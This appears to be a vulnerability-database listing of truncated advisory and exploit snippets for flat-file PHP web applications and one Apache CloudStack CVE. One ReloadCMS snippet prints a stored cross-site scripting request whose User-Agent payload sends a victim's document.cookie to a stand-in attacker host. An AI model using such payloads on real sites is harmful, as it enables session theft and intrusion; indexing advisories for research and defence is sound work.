CVE-2024-50386 Apache CloudStack: Directly downloaded templates can be used to abuse KVM-based infrastructure

Account users in Apache CloudStack by default are allowed to register templates to be downloaded directly to the primary storage for deploying instances. Due to missing validation checks for KVM-compatible templates in CloudStack 4.0.0 through 4.18.2.4 and 4.19.0.0 through 4.19.1.2, an attacker...

phpvidz 0.9.5 Administrative Credentials Disclosure

No description provided by source. Researcher: Michael Brooks Affecting: phpvidz 0.9.5 Vulnerability: Administrative Credentials Disclosure Vendor's Homepage: http://sourceforge.net/projects/phpvidz/ phpvidz does not use a SQL database. Instead it uses a system of flat files to maintain applicati...

Pritlog <= 0.4 (filename) Remote File Disclosure Vulnerability

No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog = 0.4: Remote File Edition Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: Printlog $ File affected: index.php $ Version: 0.4 $ Download: http://www.hardkap.net/pritlog Found...

ReloadCMS <= 1.2.5 Cross Site Scripting / Remote Code Execution Exploit

No description provided by source. ?php / ReloadCMS = 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: ReloadCMS is a free CMS written on PHP and based on flat files. vulnerability: ReloadCMS do not properly sanitize User-Agent request...

PHP-Board 1.0 User Password Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6862/info php-board user information is stored in flat files on the system hosting the software. Access to the files via the web is not sufficiently restricted. Remote attackers may request user files and gain access to...

PHPvidz Administrative Credentials Disclosure Vulnerability

This host is running PHPvidz and is prone to administrative credentials disclosure vulnerability. OpenVAS Vulnerability Test $Id: gbphpvidzinfodiscvuln.nasl 5794 2017-03-30 13:52:29Z cfi $ PHPvidz Administrative Credentials Disclosure Vulnerability Authors: Antu Sanadi Copyright: Copyright c 2010...

phpvidz 0.9.5 Administrative Credentials Disclosure

Exploit for php platform in category web applications =================================================== phpvidz 0.9.5 Administrative Credentials Disclosure =================================================== Researcher: Michael Brooks Affecting: phpvidz 0.9.5 Vulnerability: Administrative...

phpvidz 0.9.5 - Administrative Credentials Disclosure

Researcher: Michael Brooks Affecting: phpvidz 0.9.5 Vulnerability: Administrative Credentials Disclosure Vendor's Homepage: http://sourceforge.net/projects/phpvidz/ phpvidz does not use a SQL database. Instead it uses a system of flat files to maintain application state. The administrative passwo...

phpvidz Administrative Password Disclosure

Original Advisory:http://blog.sitewat.ch/2010/05/phpvidz-administrative-password.html Affecting: phpvidz 0.9.5 Vulnerability: Administrative Password Disclosure Vendor's Homepage: http://sourceforge.net/projects/phpvidz/ Date: May 15th 2010 Researcher: Michael Brooks phpvidz does not use a SQL...

[SECURITY] Fedora 11 Update: nss_db-2.2-46.fc11

Nssdb is a set of C library extensions which allow Berkeley Databases to be used as a primary source of aliases, ethers, groups, hosts, networks, protocol, users, RPCs, services, and shadow passwords instead of or in addition to using flat files or NIS. Install nssdb if your flat name service fil...

CuteNews Detection (HTTP)

HTTP based detection of CuteNews. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description scriptoid"1.3.6.1.4.1.25623.1.0.100105";...

CuteNews Detection

This host is running CuteNews, a powerful and easy to use news management system that uses flat files to store its database OpenVAS Vulnerability Test $Id: cutenewsdetect.nasl 5943 2017-04-12 14:44:26Z antu123 $ CuteNews Detection Authors: Michael Meyer Updated to detect UTF-8 CuteNews - By Antu...

printlog-disclose.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog eNYe-Sec - www.enye-sec.org -- Description by the author's page -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works based on flat files. The idea is derived from a...

Printlog &lt;= 0.4 (filename) Remote File Disclosure Vulnerability

No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog = 0.4: Remote File Edition Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $ Program: Printlog $ File affected: index.php $ Version: 0.4 $ Download: http://www.hardkap.net/pritlog Found...

Pritlog 0.4 - &#039;Filename&#039; Remote File Disclosure

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog eNYe-Sec - www.enye-sec.org -- Description by the author's page -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works based on flat files. The idea is derived from a...

Pritlog 0.4 - Filename Remote File Disclosure

Pritlog 0.4 - Filename Remote File Disclosure -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog eNYe-Sec - www.enye-sec.org -- Description by the author's page -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works bas...

XSS in JAB Guest Book

Script Name: JAB Guest Book Authors: [email protected] Website: James Barnsley Bug Report: NetJackal njAThackerzDOTir & nima501ATyahooDOTcom Status: Patch not released First i should apologize for my bad english. Intro: JAB Guest Book is a free guest book written in PHP, it works using flat fil...

CuteNews 1.4.1 Multiple vulnerabilities

/ --------------------------------------------------------------- Neo Security Team NST® Advisory 20 --------------------------------------------------------------- Program : CuteNews 1.4.1 Homepage: http://www.cutephp.com Vulnerable Versions: CuteNews 1.4.1 & lower ones Risk: Medium! Impact: Cro...

ReloadCMS-1.2.5.txt

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

ReloadCMS &lt;= 1.2.5stable Cross site scripting / remote command execution

?php / ReloadCMS = 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in...